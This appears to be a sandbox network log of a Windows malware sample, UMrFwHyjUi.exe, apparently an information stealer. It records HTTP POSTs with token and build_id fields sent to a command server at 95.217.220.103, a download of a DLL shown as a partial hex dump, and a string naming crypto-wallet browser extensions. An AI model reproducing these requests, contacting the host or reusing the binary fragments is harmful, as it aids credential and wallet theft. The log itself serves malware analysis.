                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          6192.168.2.44975195.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:05:34 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 7977
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:05:34 UTC7977OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------CFHDHIJDGCBAKFIEGHCBCont
                                                                                                                                                                                                                          2024-10-23 15:05:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:05:55 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:05:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          7192.168.2.44975295.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:05:35 UTC195OUTGET /sqlp.dll HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:05:36 UTC264INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:05:35 GMT
                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                          Content-Length: 2459136
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Last-Modified: Wednesday, 23-Oct-2024 15:05:35 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                          2024-10-23 15:05:36 UTC16120INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                          2024-10-23 15:05:36 UTC16384INData Raw: d3 b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                          Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                                                                          2024-10-23 15:05:36 UTC16384INData Raw: 24 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53
                                                                                                                                                                                                                          Data Ascii: $@:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhS
                                                                                                                                                                                                                          2024-10-23 15:05:36 UTC16384INData Raw: 83 f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35
                                                                                                                                                                                                                          Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                                                                                          2024-10-23 15:05:36 UTC16384INData Raw: 89 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e
                                                                                                                                                                                                                          Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                                                                          2024-10-23 15:05:36 UTC16384INData Raw: 8b 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                          Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                          2024-10-23 15:05:36 UTC16384INData Raw: 24 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                          Data Ascii: $td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                          2024-10-23 15:05:36 UTC16384INData Raw: fe ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14
                                                                                                                                                                                                                          Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                                                                          2024-10-23 15:05:36 UTC16384INData Raw: 1c 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00
                                                                                                                                                                                                                          Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                                                          2024-10-23 15:05:36 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4
                                                                                                                                                                                                                          Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$
                                                                                                                                                                                                                          2024-10-23 15:05:40 UTC16384INDELETE FROM %Q.'%q_docsize' WHERE id=?SELECT sz%s FROM %Q.'%q_docsize' WHERE id=?REPLACE INTO %Q.'%q_config' VALUES(?,?)SELECT %s FROM %s AS T,?,originDROP TABLE IF EXISTS %Q.'%q_data';DROP TABLE IF EXISTS %Q.'%q_idx';DROP TABLE IF EXISTS %Q.'%q_config';DROP TABLE IF EXISTS %Q.'%q_docsize';DROP TABLE IF EXISTS %Q.'%q_content';ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';CREATE TABLE %Q.'%q_%q'(%s)%sfts5: error creating shadow table %q_%s: %sid INTEGER PRIMARY KEY, c%did INTEGER PRIMARY KEY, sz BLOBid INTEGER PRIMARY KEY, sz BLOB, origin INTEGERk PRIMARY KEY, vDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';SELECT count(*) FROM %Q.'%q_%s'tokencharsseparatorsL* N* Cocategoriesremove_diacriticscase_sensitiveasciitrigramcolrowinstancefts5vocab: unknown table type: %Q [TRUNCATED]
                                                                                                                                                                                                                          r:Y<|=>MbP?|^~?9RF??14????K(??? ?333333?-DT!?@@-DT!@!3|@@@-DT!@@$@4@>@aTR'>@H@cL@Zd;M@Y@fffff^@r@v@@@p@@@@@@A`&A.A@}<A`FASA TAcApAdyAAeAA _B MB@dB/dB0CW4vCCC [TRUNCATED]
                                                                                                                                                                                                                          i"
                                                                                                                                                                                                                          i"$i"0i"8i"Di"Pi"\i"hi"
                                                                                                                                                                                                                          xi"i"!i"i"i"i"i"i"i"i""i"!!i""!i"9"i"?"D!!i"!i"!i"i"i"i"i"i"i"i"j"j"j"j"j"j"j"j" j",j"8j"Dj"Pj"lj"xj"j"j"j"j" k"Dk"#pk"k" k"k"&l"0l"Dl"Hl"Pl"dl"#l"l"l"l"l"l"%,m"$Xm"%m"+m"m" n""0n"(dn"*n"n"n"n"!n"o"0o"Ho"lo"!!9"i"i"D!lj"o"__based(__cdecl__pascal__stdcall__th [TRUNCATED]
                                                                                                                                                                                                                          9/I?hKd?81UH!G?#$0|f?KRVnTUUUU?~I$I?gHB;E?q{?x? @ @??@>1|MCatan2; cC($($($cC($000 cC6@cosUUUUUU?UUUUUU?*llV4V>>m0_$@8C`a=`a=@T!?sp.c;`C<??i~@sinh!87Acosh(8UA7Gtanh!*87Ay-8C8C0<0<+eGW@+eGW@B.?B.?:;=:;=t?ZfUUU?&WU?{?? [TRUNCATED]
                                                                                                                                                                                                                          !5ACPRSWYlm pr

                                                                                                                                                                                                                          )Y*"\"\/"/X"""0"""T"v"""0"x""@"""v"","@"""api-ms-win-core-datetime-l1-1-1api-ms-win-core-file-l1-2-4api-ms-win-core-file-l1-2-2api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-c [TRUNCATED]


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          8192.168.2.44975395.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:05:41 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHC
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 4677
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:05:41 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------IDGHDGIDAKEBAAKFCGHCCont
                                                                                                                                                                                                                          2024-10-23 15:06:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:02 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:06:02 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          9192.168.2.44975695.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:05:56 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKF
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 1529
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:05:56 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------KFCBAEHCAEGDHJKFHJKFCont
                                                                                                                                                                                                                          2024-10-23 15:05:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:05:57 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-10-23 15:05:57 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          10192.168.2.44976295.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:05:58 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----FCFBAKJDBKJJKFIDBGHC
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 437
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:05:58 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 41 4b 4a 44 42 4b 4a 4a 4b 46 49 44 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 41 4b 4a 44 42 4b 4a 4a 4b 46 49 44 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 41 4b 4a 44 42 4b 4a 4a 4b 46 49 44 42 47 48 43 0d 0a 43 6f 6e 74
